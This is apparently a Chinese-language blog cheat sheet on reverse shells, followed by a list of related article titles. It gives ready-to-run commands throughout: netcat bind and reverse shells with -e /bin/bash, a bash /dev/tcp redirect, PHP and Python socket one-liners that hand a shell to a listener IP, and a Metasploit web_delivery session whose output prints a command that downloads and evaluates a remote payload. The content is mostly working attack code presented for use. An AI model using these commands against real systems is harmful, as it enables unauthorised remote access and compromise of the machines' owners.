python反弹shell_反弹Shell小结
1、NC反弹shell
1.1、正向反弹shell
服务器
nc -lvvp 7777 -e /bin/bash
攻击机
nc server-ip 7777
1.2、反向反弹shell
攻击机
nc -lvvp 7777
服务器
nc -e /bin/bash Client-ip 7777
1.3、不带-e反弹:
2、 bash反弹shell
2.1 bash -i
攻击机
nc -lvvp 7777
服务器
bash -i >& /dev/tcp/Client-IP/7777 0>&1
3、PHP反弹shell
3.1 php -r
php -r '$sock=fsockopen("192.168.118.128",4444);exec("/bin/sh -i &3 2>&3");'
进行url编码:
4、python反弹
4.1、python -c
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.118.128",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.118.128",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
5、metasploit
5.1、web_delivery
use exploit/multi/script/web_delivery
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 1
target => 1
msf exploit(web_delivery) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.118.128
lhost => 192.168.118.128
msf exploit(web_delivery) > set lport 6666
lport => 6666
msf exploit(web_delivery) > set SRVPORT 8888
SRVPORT => 8888
msf exploit(web_delivery) > run
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.118.128:6666
[*] Using URL: http://0.0.0.0:8888/mDIK5UGRA8Qs76
[*] Local IP: http://192.168.118.128:8888/mDIK5UGRA8Qs76
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.118.128:8888/mDIK5UGRA8Qs76'));"
python反弹shell_反弹Shell小结相关推荐
- python反弹shell_反弹shell的几种方式总结
假设本机地址10.10.10.11,监听端口443. 1.Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 nc -lvp 443 然后在靶机上执行如下命令: bash -i ...
- python反弹shell_反弹shell的各种姿势
在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入. 反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步.所有姿势 ...
- mysql 反弹shell_反弹shell升级成交互式shell
实验环境: A : kali 虚拟机 B: centos7.5 虚拟机 1. A 机 kali 虚拟机 设置监听 端口 root@kali64:~# nc -lvvp 9001 # 端口随便定义,没被 ...
- python交互式shell_交互式 shell 玩转 Python
Python 编程语言已经成为 IT 中使用的最流行的语言之一.成功的一个原因是它可以用来解决各种问题.从网站开发到数据科学.机器学习到任务自动化,Python 生态系统有丰富的框架和库.本文将介绍 ...
- python 执行shell_用Python调用Shell命令
Python经常被称作"胶水语言",因为它能够轻易地操作其他程序,轻易地包装使用其他语言编写的库,也当然可以用Python调用Shell命令. 用Python调用Shell命令有如 ...
- python interactive shell_[python] 介绍几个Interactive Shell (上)
用Python编程,免不得需要做些实验,你可以python interactive shell 里面试一下某个表达式是否正确,某个包 是怎样使用的,用dir(obj)看看一个对象都有些啥属性,用hel ...
- python调用脚本或shell的方式
python调用脚本或shell有下面三种方式: os.system() 特点: (1)可以调用脚本. (2)可以判断是否正确执行. (3)满足不了标准输出 && 错误 command ...
- python自带的shell、其性能优于ipython_python3.4 shell
实验1 目的和要求(1) (2) (3) (4) (5) (6) (7) 开始 python 编程 了解什么是 python? 了解 python 的特性 学习下载和安装 python 学习执行 py ...
- python自带的shell、其性能优于ipython吗_根据强化的性质和目的可以分成()。 A.自然强化物和人为的近似强化物B.积极强化和消极...
根据强化的性质和目的可以分成(). A.自然强化物和人为的近似强化物B.积极强化和消极 更多相关问题 [填空题]以下程序是以只读的方式打开文件,并统计文件中字符个数.则程序中空白处应填写为(__). ...
最新文章
- SQL语句统计错误率
- 9.35 渲染时字符串转义
- 运用java集合Collections对List进行max和min操作
- VTK:图像映射到颜色用法实战
- C++学习路线和参考资料
- 写代码需要注意的几方面
- 数据比较1.0(文本格式)
- python编程else是什么意思_Python编程
- ECshop仿顺丰优选综合购物商城平台源码旗舰版+团购+触屏版+微信支付
- 如何选择合适的代理IP?以下3点需要注意
- VOD崛起《暮光之城》带动电影同步发行模式
- 闪灵CMS插件自动采集文章主动推送给搜索引擎
- java 框架_java三大主流框架是什么
- 班迪录屏- Bandicam v4.5.6
- python知网下载_GitHub - ppho99/CNKI-download: 知网(CNKI)文献下载及文献速览爬虫
- python饼状图显示其比例_Python学习笔记--使用matplotlib绘制饼状图
- 新人学习opencv图像处理的笔记,一:c++操作图像放大
- 苹果mac休眠快捷键_Mac电脑睡眠、退出登录和关机快捷键有哪些?技巧来啦!
- No matching provisioning profile found: Your build settings specify a provisioning profile with the
- 从破解运动世界校园学习模拟器检测与Xposed检测
热门文章
- 以入侵检测的视角进行应急响应
- 2023天梯赛个人题解
- AtCoder Beginner Contest 179----A.Plural Form,B.Go to Jail
- SQL查询多条进行合并
- Win系统 - Windows 10 磁盘如何分区?
- linux访问vdma的数据,zynq-7000学习笔记(十一)——Linux下VDMA的使用
- Lightroom Classic 安装教程 2023最新版本
- 分数构造方法java,Java--构造方法
- jQuery插件使用总结六:nice validator表单验证
- Python跟我说0.1+0.2!=0.3,难道这么多年的数学白学了?